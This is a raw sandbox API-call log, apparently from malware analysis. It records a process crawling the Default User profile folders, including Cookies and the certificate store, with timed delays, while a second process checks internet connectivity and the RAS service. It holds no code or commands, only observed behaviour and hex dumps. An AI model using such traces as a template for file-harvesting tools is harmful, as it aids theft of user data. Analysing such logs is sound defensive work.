FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0r\xb3/oI\xcd\x01P\xd8S\xb9\xd5I\xcd\x01P\x8e\xfd\xb7\xd5I\xcd\x01P\x8e\xfd\xb7\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x80\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01\x90\x8f/9oI\xcd\x01\xc0\x1619oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00e\x00p\x00\x00\x00\x00\x00\x00\x00\xc0\x1619oI\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:52,133 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,213 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:52,213 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01\x90\x8f/9oI\xcd\x01\xc0\x1619oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x90\x8f/9oI\xcd\x01`\xe2\xc5T\xd4I\xcd\x01\x90\x8f/9oI\xcd\x01\x90\x8f/9oI\xcd\x01>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:52,213 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,303 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:52,303 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x90P\xa0\xc8\xd4I\xcd\x01\x90P\xa0\xc8\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x10\x00I\x00N\x00T\x00E\x00R\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00 \x00E\x00x\x00p\x00l\x00o\x00r\x00e\x00r\x00x\x00\x00\x00\x00\x00\x00\x00\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:52,303 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,584 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:52,584 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:52,584 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:52,584 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:52,584 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:52,594 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:52,594 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90P\xa0\xc8\xd4I\xcd\x01\x90P\xa0\xc8\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00P\xba\xaa\xce\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\xc0\xd7\xa1\xc8\xd4I\xcd\x01\xc0\xd7\xa1\xc8\xd4I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00r\x00n\x00d\x00l\x00o\x00g\x00.\x00b\x00a\x00k\x00n\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xd7\xa1\xc8\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:52,614 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:43:52,614 | 504 | NtReadFile |
Buffer =>
06/13/2012 14:24:21 Cleaning install stubs; Company GUID is ">{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS"...
06/13/2012 14:24:21 Done.
FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:43:52,614 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:43:52,614 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:52,614 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,694 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:52,694 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:52,694 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:52,694 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,774 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:52,774 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00y\x00 |
SUCCESS | 0x00000000 | |
| 07:43:52,774 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,854 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:52,854 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01P\x12W7\xd5I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01\xc0\xaa\x89Q\xd4I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00E\x00R\x00T\x00I\x00F\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00s\x00y\x00h\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01\xc0\xaa\x89Q\xd4I\xcd\x01`\xb0M2oI\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:52,854 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,934 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:52,934 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01\xc0\xaa\x89Q\xd4I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:52,934 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:52,934 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,014 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:53,014 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01\xc0\xaa\x89Q\xd4I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,014 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,014 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,095 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00`\xb0M2oI\xcd\x01\xc0\xaa\x89Q\xd4I\xcd\x01`\xb0M2oI\xcd\x01`\xb0M2oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,095 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,095 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,175 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Cookies\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:53,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x1619oI\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01 R!0oI\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00n\x00d\x00e\x00x\x00.\x00d\x00a\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,175 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,255 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Desktop\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:53,255 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0\x1619oI\xcd\x01P\x12W7\xd5I\xcd\x01\xc0\x1619oI\xcd\x01\xc0\x1619oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,255 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,255 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,335 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Favorites\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:53,335 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0\x1619oI\xcd\x01P\x12W7\xd5I\xcd\x01\xc0\x1619oI\xcd\x01\xc0\x1619oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,335 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,335 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,395 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:53,395 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:53,395 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016e850 | |
| 07:43:53,395 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016e850 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f2b0 | |
| 07:43:53,395 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:53,395 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:53,395 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:53,415 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:53,415 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00 %49oI\xcd\x01\xa0oc\xd3\xd4I\xcd\x01P\xac59oI\xcd\x01P\xac59oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00 %49oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00 %49oI\xcd\x01\xa0oc\xd3\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:53,415 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,495 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Application Data\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:53,495 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 %49oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00I\x00C\x00R\x00O\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,495 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,735 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:53,735 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\xa0oc\xd3\xd4I\xcd\x01\xc0\xd5\xcf\xd5\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00E\x00D\x00I\x00A\x00P\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00e\x00d\x00i\x00a\x00 \x00P\x00l\x00a\x00y\x00e\x00r\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:53,735 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,816 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:53,816 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0oc\xd3\xd4I\xcd\x01\xc0\xd5\xcf\xd5\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xf6d\xd3\xd4I\xcd\x01 \xe4\xd2\xd5\xd4I\xcd\x01 \xe4\xd2\xd5\xd4I\xcd\x01 \xe4\xd2\xd5\xd4I\xcd\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00 \x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00U\x00R\x00R\x00E\x00N\x00~\x001\x00.\x00W\x00M\x00D\x00C\x00u\x00r\x00r\x00e\x00n\x00t\x00D\x00a\x00t\x00a\x00b\x00a\x00s\x00e\x00_\x005\x009\x00R\x00.\x00w\x00m\x00d\x00b\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,816 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,816 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,896 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:53,896 | 504 | NtQueryDirectoryFile |
